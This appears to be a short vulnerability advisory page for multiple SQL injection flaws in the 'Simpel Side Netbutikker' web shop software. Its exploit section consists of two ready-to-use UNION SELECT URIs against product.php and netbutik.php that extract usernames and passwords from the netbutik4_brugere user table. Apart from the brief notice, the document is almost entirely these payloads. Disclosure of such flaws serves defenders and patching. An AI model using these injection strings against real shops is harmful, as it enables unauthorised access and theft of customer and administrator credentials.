Simpel Side Netbutikker Multiple SQL Injection Vulnerabilities

info
discussion
exploit
solution
references

Simpel Side Netbutikker Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URIs are available:

http://www.example.com/product.php?id=-1+union+select+1,2,brugernavn,adgangskode,5,6,7,8,9+from+netbutik4_brugere/*
http://www.example.com/netbutik.php?cat=-1+union+select+concat_ws(0x3a3a,brugernavn,adgangskode)+from+netbutik4_brugere/*